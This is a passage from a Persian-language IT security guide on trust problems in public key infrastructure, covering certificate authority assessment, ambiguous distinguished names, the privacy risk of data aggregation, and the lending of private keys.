ﻣﻤﻜﻦ ﺍﺳﺖ ﺑﺘﻮﺍﻧﺪ ﺳﺮﻗﺖ ﻛﻠﻴﺪ ﺧﺼﻮﺻﻲ ﺍﻓﺮﺍﺩ ﺭﺍ ﺩﺷﻮﺍﺭﺗﺮ ﻛﻨﺪ ،ﺍﻣﺎ ﺍﻧﺠﺎﻡ ﺍﻳﻨﻜﺎﺭ ﺭﺍ ﻏﻴﺮﻣﻤﻜﻦ ﻧﻤﻲﺳﺎﺯﺩ.
ﺍﺳﺎﻣﻲ ﻣﻤﻴﺰﻩ ،ﺧﻮﺩ ﻣﺮﺩﻡ ﻧﻴﺴﺘﻨﺪ
ﺣﻔﺎﻇﺖ ﺍﺯ ﻛﻠﻴﺪﻫﺎﻱ ﺧﺼﻮﺻﻲ ﺑﺮﺍﻱ ﺍﻳﺠﺎﺩ ﺍﻋﺘﻤﺎﺩ ﺑﻪ PKIﻛﺎﻓﻲ ﻧﻴﺴﺖ .ﺻﺤﺖ ﻭﺍﻗﻌﻲ ﻧﺎﻣﻲ ﻛﻪ ﺭﻭﻱ ﻗـﺴﻤﺖ "ﺍﺳـﻢ ﻣﻤﻴـﺰﻩ" ﺁﻣـﺪﻩ ﺭﺍ
ﭼﮕﻮﻧﻪ ﺗﺸﺨﻴﺺ ﻣﻲﺩﻫﻴﺪ؟ ﻫﺮ ﻣﺮﮐﺰ ﺻﺪﻭﺭ ﮔﻮﺍﻫﻲ ﺗﻌﻬﺪ ﻣﻲﻛﻨﺪ ﻫﻨﮕﺎﻣﻴﻜﻪ ﺍﻣـﻀﺎﻱ ﺩﻳﺠﻴﺘـﺎﻟﻲ ﻛـﺴﻲ ﺭﺍ ﺗﺄﻳﻴـﺪ ﻣـﻲﻛﻨـﺪ ﺳﻴﺎﺳـﺘﻬﺎﻱ
ﺍﻋﻼﻡﺷﺪﺓ ﺻﺪﻭﺭ ﮔﻮﺍﻫﻲ ﺧﻮﺩ ﺭﺍ ﺩﻧﺒﺎﻝ ﻛﻨﺪ .ﺍﺯ ﻛﺠﺎ ﻣﻲﺩﺍﻧﻴﺪ ﻛﻪ ﺳﻴﺎﺳﺘﻬﺎﻱ ﺁﻥ ﻣﺮﮐﺰ ﺻﺪﻭﺭ ﮔﻮﺍﻫﻲ ﺗﻀﻤﻴﻦ ﻣﻲﻛﻨـﺪ ﻛـﻪ ﺍﺳـﻢ ﻣﻤﻴـﺰﺓ
ﺭﻭﻱ ﮔﻮﺍﻫﻲ ﻭﺍﻗﻌﹰﺎ ﻣﺘﻌﻠﻖ ﺑﻪ ﻓﺮﺩﻱ ﺍﺳﺖ ﻛﻪ ﺁﻧﻬﺎ ﻓﻜﺮ ﻣﻲﻛﻨﻨﺪ ﻣﺘﻌﻠﻖ ﺑﻪ ﺍﻭﺳﺖ؟
ﭼﮕﻮﻧﻪ ﺍﻋﺘﻤﺎﺩ ﺑﻪ ﻳﻚ ﻣﺮﮐﺰ ﺻﺪﻭﺭ ﮔﻮﺍﻫﻲ ﺭﺍ ﺍﺭﺯﻳﺎﺑﻲ ﻣﻲﻛﻨﻴﺪ؟ ﺁﻳﺎ ﻣﺮﺍﮐﺰ ﺻﺪﻭﺭ ﮔﻮﺍﻫﻲ ﺑﺎﻳﺪ ﺷﺮﻛﺘﻬﺎﻱ ﺧـﺼﻮﺻﻲ ﺑﺎﺷـﻨﺪ ﻳـﺎ ﺑـﺎﻟﻌﮑﺲ؟
ﻣﺸﺨﺺ ﺷﺪﻩ ﻛﻪ ﺩﻭﻟﺘﻬﺎ ﻫﻨﮕﺎﻣﻴﻜﻪ ﻣﻨﺎﻓﻌﺸﺎﻥ ﺍﻗﺘﻀﺎ ﻛﺮﺩﻩ ﭘﺎﺳﭙﻮﺭﺗﻬﺎﻱ ﺟﻌﻠﻲ ﻫﻢ ﺻﺎﺩﺭ ﻛﺮﺩﻩﺍﻧﺪ .ﺁﻳﺎ ﻣﻤﻜﻦ ﺍﺳـﺖ ﻳـﻚ ﻣﺮﮐـﺰ ﺻـﺪﻭﺭ
ﮔﻮﺍﻫﻲ ﻫﻢ ﺳﻴﺎﺳﺘﻬﺎﻱ ﺧﻮﺩ ﺭﺍ ﺯﻳﺮ ﭘﺎ ﺑﮕﺬﺍﺭﺩ ﻭ ﺍﺳﻨﺎﺩ ﺷﻨﺎﺳﺎﻳﻲ ﺩﻳﺠﻴﺘﺎﻟﻲ ﺟﺎﻋﻼﻧﻪ ﺻﺎﺩﺭ ﻛﻨﺪ؟ ﺍﺯ ﻃﺮﻑ ﺩﻳﮕﺮ ﭼﮕﻮﻧﻪ ﻳﻜﻲ ﺍﺯ ﺍﻳﻦ ﻣﺮﺍﮐـﺰ
ﺭﺍ ﺑﺎ ﻳﮏ ﻣﺮﮐﺰ ﺻﺪﻭﺭ ﮔﻮﺍﻫﻲ ﺩﻳﮕﺮ ﻣﻘﺎﻳﺴﻪ ﻣﻲﻛﻨﻴﺪ؟ ﺑﻌﻀﻲ ﺍﺯ ﻣﺮﺍﮐﺰ ﺻﺪﻭﺭ ﮔﻮﺍﻫﻲ ﺑﺮﺍﻱ ﺍﻃﻤﻴﻨﺎﻥ ﻣﺸﺘﺮﻱ ،ﮔﻮﺍﻫﻴﻨﺎﻣـﻪﻫـﺎﻱ ﺷـﺨﺺ
ﺛﺎﻟﺜﻲ ﭼﻮﻥ ) ١٤٧SAS 70ﮔﺰﺍﺭﺵ ﻣﻤﻴﺰﻱ ﺧﺪﻣﺎﺕ( ١٤٨ﻳﺎ WebTrustﺑﺮﺍﻱ ﻣﺮﺍﮐﺰ ﺻﺪﻭﺭ ﮔﻮﺍﻫﻲ) ١٤٩ﮔﺰﺍﺭﺵ ﺗﺼﺪﻳﻖ( ١٥٠ﺭﺍ ﺍﺧﺬ ﻣـﻲﻛﻨﻨـﺪ.
ﻛﻤﻴﺘﺔ ﺍﻣﻨﻴﺖ ﺍﻃﻼﻋﺎﺕ ﺍﻧﺠﻤﻦ ﺑﺎﺭ ﺁﻣﺮﻳﻜﺎ ١٥١ﻛﺘﺎﺑﻲ ﺑﻨﺎﻡ ﺧﻂ ﻣﺸﻲﻫﺎﻱ ﺍﺭﺯﻳﺎﺑﻲ ١٥٢PKIﻣﻨﺘﺸﺮ ﻛﺮﺩﻩ ،ﺍﻣﺎ ﻛﺎﺭﺑﺮﺍﻥ ﻣﺤﺪﻭﺩﻱ ﻣﻬـﺎﺭﺕ ﻭ
ﻳﺎ ﺍﻣﻜﺎﻥ ﺁﻧﺮﺍ ﺩﺍﺭﻧﺪ ﻛﻪ ﺑﺘﻮﺍﻧﻨﺪ ﺁﻧﺪﺳﺘﻪ ﺍﺯ ﻣﺮﺍﮐﺰ ﺻﺪﻭﺭ ﮔﻮﺍﻫﻲ ﻛﻪ ﺍﺯ ﺍﻳﻦ ﺧﻂﻣﺸﻲﻫﺎ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻛﻨﻨﺪ ﺭﺍ ﺍﺭﺯﻳﺎﺑﻲ ﻧﻤﺎﻳﻨﺪ.
ﻲ ﺍﻋﺘﺒـﺎﺭ ﺣـﻞ
ﻲ ﺷﻨﺎﺳـﺎﻳ ﹺ
ﺍﺯ ﻟﺤﺎﻅ ﻧﻈﺮﻱ ،ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﺍﻳﻦ ﺳﺆﺍﻻﺕ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺍﺯ ﻃﺮﻳﻖ ﺍﻳﺠﺎﺩ ﺍﺳﺘﺎﻧﺪﺍﺭﺩﻫﺎ ،ﻣﻤﻴﺰﻱﻫﺎ ،ﻭ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺭﺳﻤ ﹺ
ﺷﻮﻧﺪ .ﺑﺮﺍﻱ ﺧﻠﻖ ﺍﺳﺘﺎﻧﺪﺍﺭﺩﻫﺎ ﻣﻲﺗﻮﺍﻥ ﺍﺯ ﻣﻘﺮﺭﺍﺕ ﻧﻴﺰ ﺑﻬﺮﻩ ﮔﺮﻓﺖ؛ ﺍﻣﺎ ﺩﺭ ﻋﻤﻞ ،ﺗﻼﺷﻬﺎﻱ ﺍﻧﺠﺎﻡ ﺷﺪﻩ ﺗﺎ ﺍﻣﺮﻭﺯ ﭼﻨﺪﺍﻥ ﺍﻣﻴﺪﺑﺨﺶ ﻧﻴﺴﺘﻨﺪ.
ﺭﺍﺑﺮﺕ ﺍﺳﻤﻴﺖﻫﺎﻱ ﺑﺴﻴﺎﺭ ﺯﻳﺎﺩﻱ ﻭﺟﻮﺩ ﺩﺍﺭﺩ
۱۴۷ﺳﻴﺎﺳﺖ ﺍﺳﺘﺎﻧﺪﺍﺭﺩﻫﺎﻱ ﻣﻤﻴﺰﻱ ﺷﻤﺎﺭﺓ Statement on Auditing Standards) ۷۰؛ (SASﻣﺮﺑﻮﻁ ﺑﻪ ﺳﺎﺯﻣﺎﻧﻬﺎﻱ ﺧﺪﻣﺎﺗﻲ ،ﻳﻚ ﺍﺳﺘﺎﻧﺪﺍﺭﺩ ﺑـﻴﻦﺍﻟﻤﻠﻠـﻲ ﺍﺳـﺖ ﻛـﻪ
ﺗﻮﺳﻂ ﻣﺆﺳﺴﻪ ﺣﺴﺎﺑﺪﺍﺭﺍﻥ ﻋﻤﻮﻣﻲ ﮔﻮﺍﻫﻲﺷﺪﻩ ﺁﻣﺮﻳﻜﺎ )American Institute of Certified Public Accountants؛ (AICPAﺑﻮﺟﻮﺩ ﺁﻣﺪﻩ ﺍﺳﺖ .ﻳـﻚ ﺍﺭﺯﻳـﺎﺑﻲ
SAS 70ﺗﺄﻳﻴﺪ ﻣﻲﻛﻨﺪ ﻛﻪ ﻳﻚ ﻣﺆﺳﺴﻪ ﺧﺪﻣﺎﺗﻲ ،ﺍﻫﺪﺍﻑ ﻭ ﻓﻌﺎﻟﻴﺘﻬﺎﻱ ﻧﻈﺎﺭﺗﻲ ﺧﻮﺩ ﺭﺍ ﺗﻮﺳﻂ ﻳﻚ ﺷﺮﻛﺖ ﻣﺴﺘﻘﻞ ﺣﺴﺎﺑﺮﺳﻲ ﻭ ﻣﻤﻴﺰﻱ ﺑـﻪ ﺍﺭﺯﻳـﺎﺑﻲ ﻭ ﺗﺄﻳﻴـﺪ ﺭﺳـﺎﻧﺪﻩ
ﺍﺳﺖ.
148 Service Auditor Report
۱۴۹ﺗﺤﺖ ﮔﻮﺍﻫﻲ WebTrustﺑﺮﺍﻱ ﺷﺒﻜﻪﻫﺎ ،ﻳﻚ ﻣﻤﻴﺰ ﻭﺍﺟﺪ ﺷﺮﺍﻳﻂ ﻭ ﻣﺴﺘﻘﻞ ،ﺍﺯ ﻳﻚ ﻣﺠﻤﻮﻋﻪ ﺍﺻﻮﻝ ﭘﺬﻳﺮﻓﺘﻪ ﺷﺪﻩ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻛﻨﺪ ﺗﺎ ﺑﻔﻬﻤﺪ ﻛﻪ ﺁﻳﺎ ﻳﻚ ﻣﺮﻛﺰ ﺻـﺪﻭﺭ ﮔـﻮﺍﻫﻲ ﻓﻌـﺎﻝ ﺍﺯ
ﺷﺮﺍﻳﻂ ﺣﺪﺍﻗﻞ ﺍﻓﺸﺎ ،ﺧﻂ ﻣﺸﻲ ،ﺗﺠﺮﺑﻴﺎﺕ ،ﻭ ﺭﻭﺍﻟﻬﺎﻱ ﻧﻈﺎﺭﺗﻲ ﺑﺮﺧﻮﺭﺩﺍﺭ ﺍﺳﺖ ﻳﺎ ﻧﻪ.
150 Attestation Report
151 American Bar Association Information Security Committee
152 PKI Assessment Guidelines
ﺑﺨﺶ ﭘﻨﺠﻢ
ﺑﺎ ﻳﻚ ﮔﻮﺍﻫﻲ ﻛﻪ ﺭﻭﻱ ﺁﻥ ﻧﻮﺷﺘﻪ ﻣﺘﻌﻠﻖ ﺑﻪ "ﺭﺍﺑﺮﺕ ﺍﺳﻤﻴﺖ" ﺍﺳﺖ ﭼﻪ ﻣﻲﻛﻨﻴﺪ؟ ﺍﺯ ﻛﺠﺎ ﻣﻲﻓﻬﻤﻴﺪ ﻣﺘﻌﻠﻖ ﺑﻪ ﻛﺪﺍﻡ ﺭﺍﺑﺮﺍﺕ ﺍﺳﻤﻴﺖ ﺍﺳﺖ؟
ﺭﻭﺷﻦ ﺍﺳﺖ ﻛﻪ ﻳﻚ ﮔﻮﺍﻫﻲ ﺑﺎﻳﺪ ﺍﻃﻼﻋﺎﺗﻲ ﺑﻴﺶ ﺍﺯ ﺗﻨﻬﺎ ﻳﻚ ﻧﺎﻡ ﺍﺯ ﻓﺮﺩ ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ؛ ﻳﻌﻨـﻲ ﺷـﺎﻣﻞ ﺍﻃﻼﻋـﺎﺕ ﻛـﺎﻓﻲ ﺑـﺮﺍﻱ ﺷﻨﺎﺳـﺎﻳﻲ
ﺣﻘﻮﻗﻲ ﻭ ﻳﻜﺘﺎﻱ ﻓﺮﺩ ﺑﺎﺷﺪ .ﺩﺭ ﻫﺮ ﺣﺎﻝ ﻣﻤﻜﻦ ﺍﺳﺖ ﺷﻤﺎ )ﻓﺮﺩﻱ ﻛﻪ ﻣﻲﺧﻮﺍﻫﺪ ﺑﻪ ﮔﻮﺍﻫﻲ ﺭﺍﺑﺮﺕ ﺍﺳﻤﻴﺖ ﺍﻋﺘﻤﺎﺩ ﻛﻨﺪ( ﺍﻳﻦ ﺍﻃﻼﻋـﺎﺕ ﺗﻜﻤﻴﻠـﻲ ﺭﺍ
ﻧﺪﺍﻧﻴﺪ -ﻟﺬﺍ ﺑﺮﺍﻱ ﺷﻤﺎ ﻫﻨﻮﺯ ﺭﺍﺑﺮﺕ ﺍﺳﻤﻴﺖﻫﺎﻱ ﺑﺴﻴﺎﺭ ﺯﻳﺎﺩﻱ ﻭﺟﻮﺩ ﺩﺍﺭﺩ .ﺍﻟﺒﺘﻪ ﺍﮔﺮ ﺍﻳﻦ ﮔﻮﺍﻫﻲﻫﺎﻱ ﺩﻳﺠﻴﺘـﺎﻟﻲ ﺩﺍﺭﺍﻱ ﻗـﺴﻤﺘﻬﺎﻳﻲ ﺑـﺮﺍﻱ
ﺳﻦ ،ﺟﻨﺲ ،ﻳﺎ ﻋﻜﺲ ﺍﻓﺮﺍﺩ ﺑﻮﺩﻧﺪ ،ﻛﺎﺭﺑﺮﺍﻥ ﺍﻳﻨﺘﺮﻧﺖ ﻣﻲﮔﻔﺘﻨﺪ ﻛﻪ ﺍﮔﺮ ﺍﻳﻦ ﺷﻨﺎﺳﻪﻫﺎ ﺑﺪﻭﻥ ﺭﺿﺎﻳﺖ ﻛﺎﺭﺑﺮ ﺍﻓﺸﺎ ﺷﻮﻧﺪ ﺣﺮﻳﻢ ﺧﺼﻮﺻﻲ ﺁﻧﻬﺎ
ﻣﻮﺭﺩ ﺗﺠﺎﻭﺯ ﻗﺮﺍﺭ ﮔﺮﻓﺘﻪ ﺍﺳﺖ ﻭ ﺍﻟﺒﺘﻪ ﺍﻣﻜﺎﻥ ﺩﺍﺭﺩ ﺣﻖ ﺑﺎ ﺁﻧﻬﺎ ﺑﺎﺷﺪ .ﺟﻠﻮﮔﻴﺮﻱ ﺍﺯ ﺍﻳﻦ ﻣﺴﺌﻠﻪ ﺍﺻﻠﻲﺗﺮﻳﻦ ﻧﻘﻄﺔ ﻗﻮﺕ ﻛﺎﺭﺕ ﺷﻨﺎﺳﺎﻳﻲ ﺍﺳﺖ:
ﺣﺬﻑ ﮔﻤﻨﺎﻣﻲ ﻭ ﺩﺭ ﻋﻴﻦ ﺣﺎﻝ ﺣﻔﻆ ﺣﺮﻳﻢ ﺧﺼﻮﺻﻲ ،ﻭ ﺩﺭﻧﺘﻴﺠﻪ ﺑﻮﺟﻮﺩ ﺁﻭﺭﺩﻥ ﻫﻮﻳﺖ ﻭ ﻣﺴﺌﻮﻟﻴﺖﭘﺬﻳﺮﻱ.
٣٢٨
ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ
ﮔﻮﺍﻫﻲﻫﺎﻱ ﺩﻳﺠﻴﺘﺎﻝ ،ﺗﺠﻤﻴﻊ ﺩﺍﺩﻩ ﺭﺍ ﺳﺎﺩﻩ ﻣﻲﻛﻨﻨﺪ
ﻃﻲ ﺩﻭ ﺩﻫﺔ ﮔﺬﺷﺘﻪ ،ﺷﻨﺎﺳﺎﻧﻨﺪﻩﻫﺎﻱ ﺟﻬﺎﻧﻲ -ﻣﺜﻞ ﺷﻤﺎﺭﺓ ﺍﻣﻨﻴﺖ ﺍﺟﺘﻤﺎﻋﻲ ﺍﻳﺎﻻﺕ ﻣﺘﺤﺪﻩ -ﺗﺒﺪﻳﻞ ﺑﻪ ﺍﺑﺰﺍﺭﻱ ﺑـﺮﺍﻱ ﻧﻘـﺾ ﻧﻈـﺎﻡﻣﻨـﺪ
ﺣﺮﻳﻢ ﺧﺼﻮﺻﻲ ﺍﻓﺮﺍﺩ ﺷﺪﻩﺍﻧﺪ .ﺷﻨﺎﺳﺎﻧﻨﺪﻩﻫﺎﻱ ﺟﻬﺎﻧﻲ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺑﺮﺍﻱ ﺗﺠﻤﻴﻊ ﺍﻃﻼﻋﺎﺕ ﻣﻨﺎﺑﻊ ﻣﺘﻔﺎﻭﺕ ﺑﻜﺎﺭ ﺭﻭﻧﺪ ﻭ ﭘﺮﻭﻧﺪﻩﻫﺎﻱ ﻓﺮﺍﮔﻴـﺮﻱ
ﺑﺮﺍﻱ ﺍﻓﺮﺍﺩ ﺑﻮﺟﻮﺩ ﺁﻭﺭﻧﺪ .ﮔﻮﺍﻫﻲﻫﺎﻱ ﺩﻳﺠﻴﺘﺎﻟﻲ ﺻﺎﺩﺭﺷﺪﻩ ﺍﺯ ﻳﻚ ﻣﻨﻄﻘﺔ ﻣﺮﻛﺰﻱ ﺑﺼﻮﺭﺕ ﺑﺎﻟﻘﻮﻩ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺍﺑﺰﺍﺭﻱ ﺑﺴﻴﺎﺭ ﺑﻬﺘـﺮ ﺍﺯ ﺷـﻤﺎﺭﺓ
ﺍﻣﻨﻴﺖ ﺍﺟﺘﻤﺎﻋﻲ ﺑﺮﺍﻱ ﺗﺠﻤﻴﻊ ﺍﻃﻼﻋﺎﺕ ﺑﺎﺷﻨﺪ ،ﭼﻮﻥ ﺑﺰﺭﮔﺘﺮﻳﻦ ﺿﻌﻒ ﺷﻤﺎﺭﻩﻫﺎﻱ ﺍﻣﻨﻴﺖ ﺍﺟﺘﻤﺎﻋﻲ -ﺍﻃﻼﻋﺎﺕ ﻧﺎﺩﺭﺳﺖ -ﺭﺍ ﺭﻓﻊ ﻣـﻲ-
ﻛﻨﻨﺪ .ﮔﺎﻫﻲ ﺍﻭﻗﺎﺕ ﺍﻓﺮﺍﺩ ﺷﻤﺎﺭﻩﻫﺎﻱ ﺍﻣﻨﻴﺖ ﺍﺟﺘﻤﺎﻋﻲ ﺧﻮﺩ ﺭﺍ ﺗﻌﻤﺪﹰﺍ ﻧﺎﺩﺭﺳﺖ ﻣﻲﮔﻮﻳﻨﺪ ﻭ ﮔﺎﻫﻲ ﺍﻭﻗﺎﺕ ﻧﻴﺰ ﺁﻧﻬﺎ ﺭﺍ ﺍﺷﺘﺒﺎﻩ ﺗﺎﻳﭗ ﻣـﻲﻛﻨﻨـﺪ؛
ﺍﻣﺎ ﺑﺎ ﻭﺟﻮﺩ ﮔﻮﺍﻫﻲﻫﺎﻱ ﺩﻳﺠﻴﺘﺎﻟﻲ ﭼﻨﻴﻦ ﺍﺧﺘﻴﺎﺭﻱ ﺍﺯ ﺍﻓﺮﺍﺩ ﺳﻠﺐ ﺷﺪﻩ ﺍﺳﺖ.
ﻻ ﺍﻳﻦ ﺭﻭﻧﺪ ﺑـﺪﻟﻴﻞ ﻋـﺪﻡ ﺗﻄﺒﻴـﻖ ﺷـﻤﺎﺭﻩﻫـﺎ ﺑـﻪ
ﺍﻣﺮﻭﺯ ﻭﻗﺘﻲ ﺩﻭ ﺷﺮﻛﺖ ﺳﻌﻲ ﻣﻲﻛﻨﻨﺪ ﺍﻃﻼﻋﺎﺕ ﺷﻨﺎﺳﺎﻳﻲ ﻓﺮﺩﻱ ﺭﺍ ﺗﻄﺒﻴﻖ ﺩﻫﻨﺪ ،ﻣﻌﻤﻮ ﹰ
ﻣﺸﻜﻞ ﺑﺮﺧﻮﺭﺩ ﻣﻲﻛﻨﺪ .ﮔﻮﺍﻫﻲﻫﺎﻱ ﺩﻳﺠﻴﺘﺎﻟﻲ ﺑﺪﻟﻴﻞ ﻧﻮﻉ ﻃﺮﺍﺣﻲ ﺧﻮﺩ ﺍﻳﻦ ﺭﻭﻧﺪ ﺭﺍ ﺳﺎﺩﻩ ﻣﻲﻛﻨﺪ .ﺩﺭﻧﺘﻴﺠـﻪ ﺍﺣﺘﻤـﺎﻝ ﺳـﺎﺧﺘﻦ ﺑﺎﻧﻜﻬـﺎﻱ
ﺍﻃﻼﻋﺎﺗﻲ ﺑﺰﺭﮒ ﺍﻃﻼﻋﺎﺕ ﻓﺮﺩﻱ ﺗﺠﻤﻴﻊ ﺷﺪﻩ ﺍﺯ ﻣﻨﺎﺑﻊ ﻣﺘﻌﺪﺩ ﺍﻓﺰﺍﻳﺶ ﻣﻲﻳﺎﺑﺪ.
ﭼﮕﻮﻧﻪ ﻳﻚ ﻛﻠﻴﺪ ﺭﺍ ﻗﺮﺽ ﻣﻲﺩﻫﻴﺪ
ﻓﺮﺽ ﻛﻨﻴﺪ ﺷﻤﺎ ﺩﺭ ﺑﻴﻤﺎﺭﺳﺘﺎﻥ ﻣﺮﻳﺾ ﻫﺴﺘﻴﺪ ﻭ ﺍﺯ ﺩﻭﺳﺘﺘﺎﻥ "ﻛﺎﺭﻝ" ﻣﻲﺧﻮﺍﻫﻴﺪ ﺑﻪ ﺩﻓﺘﺮﺗﺎﻥ ﺑﺮﻭﺩ ﻭ ﻧﺎﻣﻪﻫﺎﻱ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺷﻤﺎ ﺭﺍ ﺑﻴـﺎﻭﺭﺩ.
ﺑﺮﺍﻱ ﺍﻧﺠﺎﻡ ﺍﻳﻨﻜﺎﺭ ﺑﺎﻳﺪ ﻛﻠﻴﺪ ﺧﺼﻮﺻﻲ ﺧﻮﺩ ﺭﺍ ﺑﻪ ﺍﻭ ﺑﺪﻫﻴﺪ .ﺁﻳﺎ ﺷﻤﺎ ﺑﺎﻳﺪ ﺍﻳﻨﻜﺎﺭ ﺭﺍ ﺍﻧﺠﺎﻡ ﺩﻫﻴﺪ؟ ﺁﻳﺎ ﺑﻌﺪ ﺍﺯ ﺍﻳﻨﻜﻪ ﻛﺎﺭ ﺍﻧﺠﺎﻡ ﺷﺪ ،ﺷﻤﺎ ﺑﺎﻳـﺪ
ﻛﻠﻴﺪ ﺧﻮﺩ ﺭﺍ ﺑﺎﻃﻞ ﻛﻨﻴﺪ؟ ﻓﺮﺽ ﻛﻨﻴﺪ ﻳﻜﻲ ﺍﺯ ﻛﺎﺭﺑﺮﺍﻥ ﺑﺎ ﻗﺴﻤﺘﻲ ﺍﺯ ﻳﻚ ﻧﺮﻡﺍﻓـﺰﺍﺭ ﻣـﺸﻜﻞ ﺩﺍﺭﺩ .ﻭﻗﺘـﻲ ﺍﺯ ﻛﻠﻴـﺪ ﺧـﺼﻮﺻﻲ Aﺍﺳـﺘﻔﺎﺩﻩ
ﻣﻲﻛﻨﺪ ﺑﺎ ﻣﺸﻜﻞ ﻣﻮﺍﺟﻪ ﻣﻲﺷﻮﺩ ،ﺍﻣﺎ ﻭﻗﺘﻲ ﺍﺯ ﻛﻠﻴﺪ ﺧﺼﻮﺻﻲ Bﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻧﻤﺎﻳﺪ ﺑﺎ ﻣﺸﻜﻠﻲ ﻣﻮﺍﺟﻪ ﻧﻤﻲﺷﻮﺩ .ﺁﻳﺎ ﺍﺯ ﻟﺤﺎﻅ ﻗﺎﻧﻮﻧﻲ ﺍﻭ ﺑﺎﻳﺪ
ﺍﺟﺎﺯﻩ ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ ﻛﻪ ﻳﻚ ﻧﺴﺨﻪ ﺍﺯ ﻛﻠﻴﺪ ﺧﺼﻮﺻﻲ Aﺭﺍ ﺑﻪ ﺗﻮﺳﻌﻪﺩﻫﻨﺪﮔﺎﻥ ﻧﺮﻡﺍﻓﺰﺍﺭ ﺑﺪﻫﺪ ﺗﺎ ﺁﻧﻬﺎ ﺑﺘﻮﺍﻧﻨﺪ ﺑﻔﻬﻤﻨﺪ ﻛﻪ ﺑﺮﻧﺎﻣﻪ ﭼﻪ ﺍﺷﻜﺎﻟﻲ
ﺩﺍﺭﺩ؟ ﻳﺎ ﺍﻭ ﺑﺎ ﺍﻧﺠﺎﻡ ﺍﻳﻨﻜﺎﺭ ﺟﺎﻣﻌﻴﺖ ﺯﻳﺮﺳﺎﺧﺖ ﻛﻠﻴﺪ ﻋﻤﻮﻣﻲ ﺭﺍ ﺑﻪ ﻣﺨﺎﻃﺮﻩ ﻧﻤﻲﺍﻧﺪﺍﺯﺩ؟
ﺣﺎﻝ ﻓﺮﺽ ﻛﻨﻴﺪ ﻛﻠﻴﺪ ﺧﺼﻮﺻﻲ ﻣﺘﻌﻠﻖ ﺑﻪ ﻓﺮﺩ ﺧﺎﺻﻲ ﻧﻴﺴﺖ ،ﻭ ﻣﺮﺑﻮﻁ ﺑﻪ ﻧﻘﺸﻲ ﺍﺳﺖ ﻛﻪ ﻭﻱ ﺩﺭ ﻳﻚ ﺷﺮﻛﺖ ﺑﺮ ﻋﻬـﺪﻩ ﺩﺍﺭﺩ .ﺑﻌﻨـﻮﺍﻥ
ﻣﺜﺎﻝ ﻳﻚ ﻛﻠﻴﺪ ﺧﺼﻮﺻﻲ ﺭﺍ ﺩﺭﻧﻈﺮ ﺑﮕﻴﺮﻳﺪ ﻛﻪ ﺑﺮﺍﻱ ﺍﻣﻀﺎﻱ ﺳﻔﺎﺭﺷﺎﺕ ﺧﺮﻳﺪ ﺍﺯ ﺁﻥ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﺷﻮﺩ .ﺁﻳﺎ ﺩﺭﺳـﺖ ﺍﺳـﺖ ﻛـﻪ ﺩﻭ ﻧﻔـﺮ ﺁﻥ
ﻛﻠﻴﺪ ﺧﺼﻮﺻﻲ ﺭﺍ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻨﺪ؟ ﻳﺎ ﺁﻥ ﺷﺮﻛﺖ ﺑﺎﻳﺪ ﺩﻭ ﻛﻠﻴﺪ ﺧﺼﻮﺻﻲ -ﻳﻚ ﻛﻠﻴﺪ ﺑﺮﺍﻱ ﻫﺮﻳﻚ ﺍﺯ ﻛﺴﺎﻧﻲ ﻛﻪ ﺑﺎﻳﺪ ﺳﻔﺎﺭﺷـﺎﺕ ﺧﺮﻳـﺪ ﺭﺍ
ﺍﻣﻀﺎ ﻛﻨﻨﺪ -ﺑﺴﺎﺯﺩ؟
ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ﺩﺭ ﺷﺒﻜﻪ
ﺑﺮﺍﻱ ﺣﻞ ﻣﺸﻜﻞ ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ﻛﺎﺭﺑﺮ ﺩﺭ ﻣﺤﻴﻄﻬﺎﻳﻲ ﻛﻪ ﺩﺭ ﺁﻧﻬﺎ ﭼﻨﺪ ﺍﻳﺴﺘﮕﺎﻩ ﻛﺎﺭﻱ ﻣﺘﺼﻞ ﺑﻪ ﻫﻢ ﺍﺯ ﻃﺮﻳﻖ ﻳـﻚ ﺷـﺒﻜﺔ ﻧـﺎﻣﻄﻤﺌﻦ ﻭ
ﻻ ﻧﺎﺍﻣﻦ ﺩﺭ ﺩﺳﺘﺮﺱ ﻛﺎﺭﺑﺮﺍﻥ ﻗﺮﺍﺭ ﺩﺍﺭﻧﺪ ﺭﺍﻩﺣﻠﻬﺎﻱ ﺯﻳﺎﺩﻱ ﭘﻴﺸﻨﻬﺎﺩ ﺷﺪﻩ ﺍﺳﺖ .ﺑﺮﺍﻱ ﺳﺎﺩﮔﻲ ﺗﺮﺟﻴﺢ ﻣـﻲﺩﻫـﻴﻢ ﺍﻃﻼﻋـﺎﺕ ﺣـﺴﺎﺏ
ﺍﺣﺘﻤﺎ ﹰ
ﻛﺎﺭﺑﺮﻱ ﻛﺎﺭﺑﺮ ﺩﺭ ﻳﻚ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ ﻣﺮﻛﺰﻱ ﺫﺧﻴﺮﻩ ﺷﻮﺩ ،ﺍﻣﺎ ﺑﺮﺍﻱ ﺍﻃﻤﻴﻨﺎﻥ ﺑﻴﺸﺘﺮ ﻣﻤﻜﻦ ﺍﺳﺖ ﺑﺨﻮﺍﻫﻴﻢ ﺍﻃﻼﻋﺎﺕ ﺁﻥ ﺳﺮﻭﻳﺲﺩﻫﻨـﺪﺓ
